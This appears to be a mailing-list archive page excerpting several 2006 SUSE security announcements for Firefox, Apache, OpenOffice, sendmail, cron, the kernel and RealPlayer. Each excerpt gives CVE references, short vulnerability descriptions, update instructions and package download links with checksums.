ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/mozilla-nss-devel-3.11-21.7.i586.rpm 5176d16fddcc9085c9c62633df1c1e7a ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/openssl-0.9.8a-18.7.i586.rpm f3c5cb97da8acb6a4c4ef9434cb89e1a ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/openssl-devel-0.9.8a-18.7.i586.rpm 20c03b69fb682e341fbcbd6e0b7fa08d SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/mozilla-nss-3.10-12.3.i586.rpm f1040a75792a24085ffeacaf4fdbbadb ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/mozilla-nss-devel-3.10-12.3.i586.rpm f666ce57dcedd14078d2289831658ec2 ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/openssl-0.9.7g-2.8.i586.rpm 2a2ec627749b0ebef913522777d6d10a ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/openssl-devel-0.9.7g-2.8.i586.rpm 0889bf02be6b048e62109510b711debf SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/openssl-0.9.7e-3.4.i586.rpm ef34f676b7c3279c368d044a35761e23
[Full-disclosure] SUSE Security Announcement: MozillaFirefox, MozillaThunderbird, Seamonkey (SUSE-SA:2006:048)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:MozillaFirefox,MozillaThunderbird,Seamonkey Announcement ID:SUSE-SA:2006:048 Date: Wed, 16 Aug 2006 17:00:00 + Affected Products: Novell Linux Desktop 9 SLE SDK 10 SUSE LINUX 10.1 SUSE LINUX 10.0 SUSE LINUX 9.3 SUSE LINUX 9.2 SUSE SLES 10 Vulnerability Type: remote code execution Severity (1-10):8 SUSE Default Package: yes Cross-References: CVE-2006-3113, CVE-2006-3677, CVE-2006-3801 CVE-2006-3802, CVE-2006-3803, CVE-2006-3804 CVE-2006-3805, CVE-2006-3806, CVE-2006-3807 CVE-2006-3808, CVE-2006-3809, CVE-2006-3810 CVE-2006-3811, CVE-2006-3812, MFSA 2006-01 MFSA 2006-10, MFSA 2006-44, MFSA 2006-45 MFSA 2006-46, MFSA 2006-47, MFSA 2006-48 MFSA 2006-49, MFSA 2006-50, MFSA 2006-51 MFSA 2006-52, MFSA 2006-53, MFSA 2006-54 MFSA 2006-55, MFSA 2006-56 Content of This Advisory: 1) Security Vulnerability Resolved: various mozilla browser security problems Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion To fix various security problems we released update packages that bring Mozilla Firefox to version 1.5.0.6, MozillaThunderdbird to version 1.5.0.5 and the Seamonkey Suite to version 1.0.3. Note that on Novell Linux Desktop 9 and SUSE Linux 9.2 up to 10.0 this is a major version upgrade of Mozilla Firefox, please check if your Firefox plugins are still working. Still missing are updates for the (discontinued) Mozilla Suite. More details on the security problems can be found on: http://www.mozilla.org/projects/security/known-vulnerabilities.html The update includes fixes to the following security problems: - CVE-2006-3801/MFSA 2006-44: Code execution through deleted frame reference Thilo Girmann discovered that in certain circumstances a JavaScript reference to a frame or window was not properly cleared when the referenced content went away, and he demonstrated that this pointer to a deleted object could be used to execute native code supplied by the attacker. - CVE-2006-3677/MFSA 2006-45: Javascript navigator Object Vulnerability An anonymous researcher for TippingPoint and the Zero Day Initiative showed that when used in a web page Java would reference properties of the window.navigator object as it started up. If the page replaced the navigator object before starting Java then the browser would crash in a way that could be exploited to run native code supplied by the attacker. - CVE-2006-3113/MFSA 2006-46: Memory corruption with simultaneous events Secunia Research has discovered a vulnerability in Mozilla Firefox 1.5 branch, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an memory corruption error within the handling of simultaneously happening XPCOM events, which leads to use of a deleted timer object. This generally results in a crash but potentially could be exploited to execute arbitrary code on a user's system when a malicious website is visited. - CVE-2006-3802/MFSA 2006-47: Native DOM methods can be hijacked across domains A malicious page can hijack native DOM methods on a document object in another domain, which will run the attacker's script when called by the victim page. This could be used to steal login cookies, password, or other sensitive data on the target page, or to perform actions on behalf of a logged-in user. Access checks on all other properties and document nodes are performed correctly. This cross-site scripting (XSS) attack is limited to pages which use standard DOM methods of the top-level document object, such as document.getElementById(). This includes many popular sites, especially the newer ones that offer rich
[Full-disclosure] SUSE Security Announcement: apache, apache2 mod_rewrite problem (SUSE-SA:2006:043)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:apache,apache2 Announcement ID:SUSE-SA:2006:043 Date: Fri, 28 Jul 2006 17:00:00 + Affected Products: SLE SDK 10 SUSE LINUX 10.1 SUSE LINUX 10.0 SUSE LINUX 9.3 SUSE LINUX 9.2 SUSE SLES 10 SUSE SLES 9 Vulnerability Type: remote denial of service Severity (1-10):6 SUSE Default Package: yes Cross-References: CVE-2005-3352, CVE-2006-3747 Content of This Advisory: 1) Security Vulnerability Resolved: Apache off by one security problem Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion The following security problem was fixed in the Apache and Apache 2 web servers: mod_rewrite: Fix an off-by-one security problem in the ldap scheme handling. For some RewriteRules this could lead to a pointer being written out of bounds. Depending on stack alignment this could be used to potentially execute code. The mod_rewrite module is not enabled per default in our packages. This problem is tracked by the Mitre CVE ID CVE-2006-3747. A more detailed description of this problem is available in: http://www.apache.org/dist/httpd/Announcement2.0.html For SUSE Linux 10.0, 10.1 and SUSE Linux Enterprise 10 additionally a old bug was fixed that we missed to forward port to the Apache 2.2 packages: mod_imap: Fixes a cross-site-scripting bug in the imagemap module. This issue is tracked by the Mitre CVE ID CVE-2005-3352. 2) Solution or Work-Around There is no known workaround, please install the update packages. 3) Special Instructions and Notes Please close and restart all running instances of Apache after the update. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. x86 Platform: SUSE LINUX 10.1: ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/apache2-2.2.0-21.7.i586.rpm 124342d5311b318586d91d12117bdd2a ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/apache2-prefork-2.2.0-21.7.i586.rpm 4a73ae89777943f4127743f817f0a0a5 ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/apache2-worker-2.2.0-21.7.i586.rpm 1905af7f606986f1818ebed5bd3382d5 SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/apache2-2.0.54-10.5.i586.rpm adf6c8665b9f0f36c6a7720a8f1bfad1 ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/apache2-prefork-2.0.54-10.5.i586.rpm 1cbcec6896dc46504140177b48ca014d ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/apache2-worker-2.0.54-10.5.i586.rpm f721e397c518cc6160886a1296e5a109 SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/apache2-2.0.53-9.12.i586.rpm e6ae2ee1353c1f1c31c0595b60d18137 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/apache2-prefork-2.0.53-9.12.i586.rpm cb02c5f97671d2ab0a64215ed9987c2f ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/apache2-worker-2.0.53-9.12.i586.rpm b8872991cf54d99659e60d860d0c44e8 SUSE LINUX 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/apache2-2.0.50-7.14.i586.rpm 9365d403839e7c0740aae1e2f1b6cdfc ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/apache2-prefork-2.0.50-7.14.i586.rpm 97d506d68996f80ff6494a127f7c ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/apache2-worker-2.0.50-7.14.i586.rpm f649e8eb98d43d6a44231f0c7453c9b2 Power PC Platform: SUSE LINUX 10.1: ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/apache2-2.2.0-21.7.ppc.rpm 133b02c7a3a52a2bf144ece351ba00a1
[Full-disclosure] SUSE Security Announcement: OpenOffice_org remote code execution (SUSE-SA:2006:040)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:OpenOffice_org Announcement ID:SUSE-SA:2006:040 Date: Mon, 03 Jul 2006 16:00:00 + Affected Products: Novell Linux Desktop 9 SUSE LINUX 10.1 SUSE LINUX 10.0 SUSE LINUX 9.3 SUSE LINUX 9.2 SUSE LINUX 9.1 SuSE Linux Desktop 1.0 Vulnerability Type: remote code execution Severity (1-10):8 SUSE Default Package: yes Cross-References: CVE-2006-2198, CVE-2006-2199, CVE-2006-3117 Content of This Advisory: 1) Security Vulnerability Resolved: OpenOffice_org security problems Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion Following security problems were found and fixed in OpenOffice_org: - CVE-2006-2198: A security vulnerability in OpenOffice.org may make it possible to inject basic code into documents which is executed upon loading of the document. The user will not be asked or notified and the macro will have full access to system resources with current user's privileges. As a result, the macro may delete/replace system files, read/send private data and/or cause additional security issues. Note that this attack works even with Macro execution disabled. This attack allows remote attackers to modify files / execute code as the user opening the document. - CVE-2006-2199: A security vulnerability related to OpenOffice.org documents may allow certain Java applets to break through the sandbox and therefore have full access to system resources with current user privileges. The offending Applets may be constructed to destroy/replace system files, read or send private data, and/or cause additional security issues. Since Java applet support is only there for historical reasons, as StarOffice was providing browser support, the support has now been disabled by default. - CVE-2006-3117: A buffer overflow in the XML UTF8 converter allows for a value to be written to an arbitrary location in memory. This may lead to command execution in the context of the current user. 2) Solution or Work-Around There is no known workaround, please install the update packages. 3) Special Instructions and Notes Please close and restart all running instances of OpenOffice_org after the update. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. x86 Platform: SUSE LINUX 10.1: ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/OpenOffice_org-2.0.2-27.12.i586.rpm 649b45c223e2eef491f3e89b457be3f2 ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/OpenOffice_org-af-2.0.2-27.12.i586.rpm 09afa80d882ab9c1388139874e7107e9 ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/OpenOffice_org-ar-2.0.2-27.12.i586.rpm 70d9cf35ca87e78f8a30821ba271ac30 ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/OpenOffice_org-be-BY-2.0.2-27.12.i586.rpm d044a2f22c518322ea35388adb7d8bd0 ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/OpenOffice_org-bg-2.0.2-27.12.i586.rpm 37cac5cbe14215491e65f78fd7d1f013 ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/OpenOffice_org-ca-2.0.2-27.12.i586.rpm f458c2b61425e171b556a40e918d07db ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/OpenOffice_org-cs-2.0.2-27.12.i586.rpm 0af5024dafc41d80456eb14950cbcdb5 ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/OpenOffice_org-cy-2.0.2-27.12.i586.rpm ef66e97820d34e6f61c0f0dc61e0f690 ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/OpenOffice_org-da-2.0.2-27.12.i586.rpm
[Full-disclosure] SUSE Security Announcement: sendmail remote denial of service attack (SUSE-SA:2006:032)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:sendmail Announcement ID:SUSE-SA:2006:032 Date: Wed, 14 Jun 2006 19:00:00 + Affected Products: SUSE LINUX 10.1 SUSE LINUX 10.0 SUSE LINUX 9.3 SUSE LINUX 9.2 SUSE LINUX 9.1 SuSE Linux Enterprise Server 8 SUSE SLES 9 UnitedLinux 1.0 Vulnerability Type: remote denial of service Severity (1-10):5 SUSE Default Package: no Cross-References: CVE-2006-1173, VU#146718 Content of This Advisory: 1) Security Vulnerability Resolved: sendmail remote denial of service attack Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion The Mail Transfer Agent sendmail has a remote exploitable problem, where a specially crafted MIME messages can crash sendmail and block queue processing. This issue is tracked by the Mitre CVE ID CVE-2006-1173 and CERT VU#146718. 2) Solution or Work-Around There is no known workaround, please install the update packages. 3) Special Instructions and Notes Please close and restart all running instances of sendmail after the update. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. x86 Platform: SUSE LINUX 10.1: ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/sendmail-8.13.6-9.3.i586.rpm 1e3fa1b7a729d2b260a4da6d9ff962f4 SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/sendmail-8.13.4-8.6.i586.rpm 70a41db80164fb7d50e823774566ea9e SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/sendmail-8.13.3-5.6.i586.rpm 94679162ea3b479f20362f0d01ea4d72 SUSE LINUX 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/sendmail-8.13.1-5.6.i586.rpm 10e79f3a40ec0c25911cf2549009d609 SUSE LINUX 9.1: ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/sendmail-8.12.11-2.7.i586.rpm adc59ac9fa4ba76743bd073e0334b9d9 Power PC Platform: SUSE LINUX 10.1: ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/sendmail-8.13.6-9.3.ppc.rpm 81580c25511daa9862a1dd8f5ca7d48b SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/sendmail-8.13.4-8.6.ppc.rpm ff81143d1dee29c58aea6038a952c903 x86-64 Platform: SUSE LINUX 10.1: ftp://ftp.suse.com/pub/suse/update/10.1/rpm/x86_64/sendmail-8.13.6-9.3.x86_64.rpm 8f724bcf3c0aaac8923241c9f3288c40 SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/sendmail-8.13.4-8.6.x86_64.rpm 40fc8a5f7ad12159528b8cc1d4c2173f SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/sendmail-8.13.3-5.6.x86_64.rpm d8b8ba804ac1a04b22d673c52d654f69 SUSE LINUX 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/sendmail-8.13.1-5.6.x86_64.rpm 6dcf297dbbcfb5d2b7d0a55efb9c3099 SUSE LINUX 9.1: ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/sendmail-8.12.11-2.7.x86_64.rpm dd3ed5bd5318928a9bfe4320eed67027 Sources: SUSE LINUX 10.1: ftp://ftp.suse.com/pub/suse/update/10.1/rpm/src/sendmail-8.13.6-9.3.src.rpm 7ed5b46eb2ed2a18becadf43b8cba7b1 SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/sendmail-8.13.4-8.6.src.rpm 0f93d3d608305d44667ec1b35a76e626 SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/sendmail-8.13.3-5.6.src.rpm c9ac83c770a63f94fe18a156898ffe70 SUSE LINUX 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/src/sendmail-8.13.1-5.6.src.rpm
[Full-disclosure] SUSE Security Announcement: cron local privilege escalation (SUSE-SA:2006:027)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:cron Announcement ID:SUSE-SA:2006:027 Date: Wed, 31 May 2006 15:00:00 + Affected Products: SUSE LINUX 10.1 SUSE LINUX 10.0 SUSE LINUX 9.3 SUSE LINUX 9.2 SUSE LINUX 9.1 SuSE Linux Desktop 1.0 SuSE Linux Enterprise Server 8 SUSE SLES 9 UnitedLinux 1.0 Vulnerability Type: local privilege escalation Severity (1-10):7 SUSE Default Package: yes Cross-References: CVE-2006-2607 Content of This Advisory: 1) Security Vulnerability Resolved: local privilege escalation using cron Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion Vixie Cron is the default CRON daemon in all SUSE Linux based distributions. The code in do_command.c in Vixie cron does not check the return code of a setuid call, which might allow local users to gain root privileges if setuid fails in cases such as PAM failures or resource limits. This problem is known to affect only distributions with Linux 2.6 kernels, but the package was updated for all distributions for completeness. This problem is tracked by the Mitre CVE ID CVE-2006-2607. 2) Solution or Work-Around There is no known workaround, please install the update packages. 3) Special Instructions and Notes Please restart cron after the update. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. x86 Platform: SUSE LINUX 10.1: ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/cron-4.1-45.3.i586.rpm e497e8d493f1b94c0891af1026be4d0a SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/cron-4.1-26.2.i586.rpm a7daa9be8f6d1f3d5b87904e934ee235 SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/cron-4.1-20.2.i586.rpm feabbd699c9504dc4cf0bf0ba91e6f2d SUSE LINUX 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/cron-4.1-14.2.i586.rpm 0979cea40c43166044c66364b148101b SUSE LINUX 9.1: ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/cron-3.0.1-920.12.i586.rpm e140f798e6146f52ca2621a6ef678a45 Power PC Platform: SUSE LINUX 10.1: ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/cron-4.1-45.3.ppc.rpm 0b0550667503fc422ae7601b4cb513e6 SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/cron-4.1-26.2.ppc.rpm 711aeec2e8bfcb02835478e3c5bc62c8 x86-64 Platform: SUSE LINUX 10.1: ftp://ftp.suse.com/pub/suse/update/10.1/rpm/x86_64/cron-4.1-45.3.x86_64.rpm 01885af8563e8f2e093b7741e0e7ee95 SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/cron-4.1-26.2.x86_64.rpm 3716db1e6d608fc4714b8ac137c94059 SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/cron-4.1-20.2.x86_64.rpm 4287461b019ece311e32082fd87bc0a9 SUSE LINUX 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/cron-4.1-14.2.x86_64.rpm 574294ae7f583add41bd45774988cb4e SUSE LINUX 9.1: ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/cron-3.0.1-920.12.x86_64.rpm 6b26840c02592f7978d841f99743371d Sources: SUSE LINUX 10.1: ftp://ftp.suse.com/pub/suse/update/10.1/rpm/src/cron-4.1-45.3.src.rpm f43d85f87f2571b7a72c580f40027abd SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/cron-4.1-26.2.src.rpm 78ea0581677076016e90b109e6154b12 SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/cron-4.1-20.2.src.rpm
[Full-disclosure] SUSE Security Announcement: kernel (SUSE-SA:2006:028)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:kernel Announcement ID:SUSE-SA:2006:028 Date: Wed, 31 May 2006 18:00:00 + Affected Products: SUSE LINUX 10.0 SUSE LINUX 9.3 SUSE LINUX 9.2 SUSE LINUX 9.1 SuSE Linux Desktop 1.0 SuSE Linux Enterprise Server 8 SUSE SLES 9 UnitedLinux 1.0 Vulnerability Type: remote denial of service Severity (1-10):7 SUSE Default Package: yes Cross-References: CVE-2005-4798, CVE-2006-0095, CVE-2006-0457 CVE-2006-0554, CVE-2006-0555, CVE-2006-0557 CVE-2006-0741, CVE-2006-0742, CVE-2006-0744 CVE-2006-1055, CVE-2006-1056, CVE-2006-1242 CVE-2006-1342, CVE-2006-1523, CVE-2006-1524 CVE-2006-1525, CVE-2006-1527, CVE-2006-1863 CVE-2006-1864, CVE-2006-2271, CVE-2006-2272 CVE-2006-2274 Content of This Advisory: 1) Security Vulnerability Resolved: various kernel security problems Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion The Linux kernel has been updated to fix various security problems, listed below. Note that some of the updates have already been released end of last week. - AppArmor in SUSE Linux 10.0 and SUSE Linux Enterprise Server 9 SP3 could crash the machine by an negative dentry reference due to for instance vanishing path component during a system call of a profiled application. - AppArmor in SUSE Linux 10.0 and SUSE Linux Enterprise Server 9 SP3 failed to prevent PTRACE_ME on a confined parent, allowing an infected called program to gain the same rights as its parent process. - CVE-2006-2274: Linux SCTP allows remote attackers to cause a denial of service (infinite recursion and crash) via a packet that contains two or more DATA fragments, which causes an skb pointer to refer back to itself when the full message is reassembled, leading to infinite recursion in the sctp_skb_pull function. - CVE-2006-2272: Linux SCTP allowed remote attackers to cause a denial of service (kernel panic) via incoming IP fragmented (1) COOKIE_ECHO and (2) HEARTBEAT SCTP control chunks. - CVE-2006-2271: The ECNE chunk handling in Linux SCTP allowed remote attackers to cause a denial of service (kernel panic) via an unexpected chunk when the session is in CLOSED state. - CVE-2006-1864: Due to incorrect argument checking it was possible to break out of chroots on smbfs file systems. - CVE-2006-1863: Due to incorrect argument checking it was possible to break out of chroots on cifs file systems. - CVE-2006-1527: NETFILTER SCTP conntrack: Fixed an infinite loop in sctp handling, which could be caused by a remote attacker. - CVE-2006-1525: IPV4: Fixed a machine crash in ip_route_input that could be triggered via the route command from local attackers. - CVE-2006-1524: shmat: stop mprotect from giving write permission to a read-only shared memory attachment. - CVE-2006-1523: __group_complete_signal: Removed a bogus BUG_ON which could lead to unwanted process crashes. - CVE-2006-1342: A minor information leak in SO_ORIGINAL_DST was fixed. - CVE-2006-1242: Fix IPv4 IPID generation to avoid possible idle scans against the machine. - CVE-2006-1056: i386/x86-64: Fix AMD x87 information leak between processes. - CVE-2006-1055: sysfs: Zero terminate sysfs write buffers. - CVE-2006-0744: When the user could have changed %RIP always force IRET. - CVE-2006-0742: IA64 only: Don't declare die_if_kernel as noreturn, otherwise local attackers can crash the machine. - CVE-2006-0741: x86_64 only: Always check that RIPs are canonical during signal handling, otherwise local attackers could crash the machine. - CVE-2006-0557: Add an upper boundary to mempolicy node arguments to avoid potentially local crashes. - CVE-2006-0555: A normal user was able to panic the NFS
[Full-disclosure] SUSE Security Announcement: Mozilla Firefox, Mozilla Suite various problems (SUSE-SA:2006:021)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:MozillaFirefox,mozilla Announcement ID:SUSE-SA:2006:021 Date: Thu, 20 Apr 2006 09:00:00 + Affected Products: Novell Linux Desktop 9 SUSE LINUX 10.0 SUSE LINUX 9.3 SUSE LINUX 9.2 SUSE LINUX 9.1 SuSE Linux Desktop 1.0 SuSE Linux Enterprise Server 8 SUSE SLES 9 UnitedLinux 1.0 Vulnerability Type: remote code execution Severity (1-10):8 SUSE Default Package: yes Cross-References: CVE-2006-0749, CVE-2006-0884, CVE-2006-1727 CVE-2006-1728, CVE-2006-1729, CVE-2006-1730 CVE-2006-1731, CVE-2006-1732, CVE-2006-1733 CVE-2006-1734, CVE-2006-1735, CVE-2006-1736 CVE-2006-1737, CVE-2006-1738, CVE-2006-1739 CVE-2006-1740, CVE-2006-1741, CVE-2006-1742 CVE-2006-1790 MFSA 2006-09, MFSA 2006-10, MFSA 2006-11 MFSA 2006-12, MFSA 2006-13, MFSA 2006-14 MFSA 2006-15, MFSA 2006-16, MFSA 2006-17 MFSA 2006-18, MFSA 2006-19, MFSA 2006-21 MFSA 2006-22, MFSA 2006-23, MFSA 2006-24 MFSA 2006-25 Content of This Advisory: 1) Security Vulnerability Resolved: various security problems in Mozilla based browsers Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion A number of security issues have been fixed in the Mozilla browser suite and the Mozilla Firefox browser. These problems could be used by remote attackers to gain privileges, gain access to confidential information or to cause denial of service attacks. The updates of the Firefox packages bring it up to Firefox 1.0.8 fix level. The updates of the Mozilla suite bring it up to Mozilla 1.7.13 fix level. Mozilla Thunderbird is also affected by some of the listed issues, but updates will be provided later due to unrelated problems. Most of them can be worked around by turning Java Script in Mails off (which is the default for Thunderbird). Full details of all issues can be found on: http://www.mozilla.org/security/announce/ List of issues that were fixed: MFSA 2006-25/CVE-2006-1727: Privilege escalation through Print Preview MFSA 2006-24/CVE-2006-1728: Privilege escalation using crypto.generateCRMFRequest MFSA 2006-23/CVE-2006-1729: File stealing by changing input type MFSA 2006-22/CVE-2006-1730: CSS Letter-Spacing Heap Overflow Vulnerability MFSA 2006-21/CVE-2006-0884: Javascript execution when forwarding or replying MFSA 2006-19/CVE-2006-1731 Cross-site scripting using .valueOf.call() MFSA 2006-18/CVE-2006-0749 Mozilla Firefox Tag Order Vulnerability MFSA 2006-17/CVE-2006-1732 Cross-site scripting through window.controllers MFSA 2006-16/CVE-2006-1733 Accessing XBL compilation scope via valueOf.call() MFSA 2006-15/CVE-2006-1734 Privilege escalation using a JavaScript functions cloned parent MFSA 2006-14/CVE-2006-1735 Privilege escalation via XBL.method.eval MFSA 2006-13/CVE-2006-1736 Downloading executables with Save Image As... MFSA 2006-12/CVE-2006-1740 Secure-site spoof (requires security warning dialog) MFSA 2006-11/CVE-2006-1739,CVE-2006-1737,CVE-2006-1738,CVE-2006-1790 Crashes with evidence of memory corruption (rv:1.8) MFSA 2006-10/CVE-2006-1742 JavaScript garbage-collection hazard audit MFSA 2006-09/CVE-2006-1741 Cross-site JavaScript injection using event handlers We wish to thank the Mozilla Developers and the various bug reporters for reporting and fixing those issues. 2) Solution or Work-Around There is no known workaround, please install the update packages. 3) Special Instructions and Notes None. 4) Package Location and Checksums The preferred method
[Full-disclosure] SUSE Security Announcement: RealPlayer security problems (SUSE-SA:2006:018)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:RealPlayer Announcement ID:SUSE-SA:2006:018 Date: Thu, 23 Mar 2006 12:00:00 + Affected Products: Novell Linux Desktop 9 SUSE LINUX 10.0 SUSE LINUX 9.3 SUSE LINUX 9.2 Vulnerability Type: remote code execution Severity (1-10):8 SUSE Default Package: yes Cross-References: CVE-2005-2922, CVE-2006-0323 Content of This Advisory: 1) Security Vulnerability Resolved: realplayer security problems Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion This update fixes the following security problems in Realplayer: - Specially crafted SWF files could cause a buffer overflow and crash RealPlayer (CVE-2006-0323). - Specially crafted web sites could cause heap overflow and lead to executing arbitrary code (CVE-2005-2922). This was already fixed with the previously released 1.0.6 version, but not announced on request of Real. The advisory for these problems is on this page at Real: http://service.real.com/realplayer/security/03162006_player/en/ SUSE Linux 9.2 up to 10.0 and Novell Linux Desktop 9 are affected by this problem and receive fixed packages. If you are still using Realplayer on SUSE Linux 9.1 or SUSE Linux Desktop 1, we again wish to remind you that the Real player on these products cannot be updated and recommend to deinstall it. 2) Solution or Work-Around There is no known workaround, please install the update packages. 3) Special Instructions and Notes None. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. 